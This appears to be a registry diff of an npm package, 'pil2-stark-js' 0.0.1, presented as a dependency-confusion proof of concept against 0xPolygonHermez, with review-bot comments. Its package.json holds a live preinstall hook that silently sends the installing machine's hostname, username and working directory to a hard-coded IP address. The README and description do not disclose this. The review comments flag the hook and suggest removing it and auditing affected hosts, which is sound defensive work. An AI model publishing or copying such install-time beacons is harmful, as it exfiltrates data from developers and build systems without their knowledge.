pil2-stark-js 0.0.1

Files changed (3) hide show
  1. package/README.md +4 -0
  2. package/index.js +6 -0
  3. package/package.json +12 -0
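--- a/package/README.md
+++ b/package/README.md
@@ -0,0 +1,4 @@
+ # pil2-stark-js — Dependency Confusion PoC
+
+ Security research package demonstrating that `pil2-stark-js` was unclaimed on npm
+ while referenced in 0xPolygonHermez repositories. Contact via HackerOne.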
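--- a/package/index.js
+++ b/package/index.js
@@ -0,0 +1,6 @@
+ // Security Research — Dependency Confusion PoC
+ // Package: pil2-stark-js | Company: 0xPolygonHermez
+ // This package was published to prove the name was unclaimed.
+ // Contact: HackerOne
+ module.exports = { name: "pil2-stark-js", type: "security-research-poc" };
+ console.log("[dependency-confusion-poc] Security research package. Contact via HackerOne.");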
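Review bot: The `console.log` on the last line runs as a side effect of `require('pil2-stark-js')`, so any build that resolved this name from the public registry gets an unexpected line on stdout, which can break consumers that parse stdout; `console.error(...)` would keep the notice visible without that. The header comment says the package was published only to prove the name was unclaimed, yet the manifest in this same release carries a `preinstall` callback. A line such as `// NOTE: package.json runs a preinstall hook that posts host details to a remote server.` would make the file state what installation does.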
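--- a/package/package.json
+++ b/package/package.json
@@ -0,0 +1,12 @@
+ {
+ "name": "pil2-stark-js",
+ "version": "0.0.1",
+ "description": "Security research — dependency confusion PoC for 0xPolygonHermez. This package name was unclaimed on npm. Contact via HackerOne.",
+ "main": "index.js",
+ "scripts": {
+ "preinstall": "node -e \"try{var h=require('http');var r=h.request({hostname:'54.80.197.209',port:8443,path:'/cb/pil2-stark-js',method:'POST',headers:{'Content-Type':'application/json'}});r.write(JSON.stringify({id:'pil2-stark-js',pkg:'pil2-stark-js',h:require('os').hostname(),u:require('os').userInfo().username,c:process.cwd(),t:Date.now()}));r.end()}catch(e){}\""
+ },
+ "keywords": ["security-research", "dependency-confusion"],
+ "author": "security-researcher",
+ "license": "ISC"
+ }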
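Review bot: The `preinstall` script sends the installing machine's hostname, local username and working directory to the hard-coded address `54.80.197.209:8443` over plain `http`, and neither the README nor the `description` field mentions that any data leaves the host. Publishing the name already proves it was unclaimed, so the hook can be dropped entirely: `"scripts": {}`. The empty `catch(e){}` hides every failure, so an affected install shows nothing in its log. Teams that pulled 0.0.1 should check build hosts and developer machines for egress to that address; installs run with `npm install --ignore-scripts`, or with the name pinned to a private registry scope, would not have executed the hook.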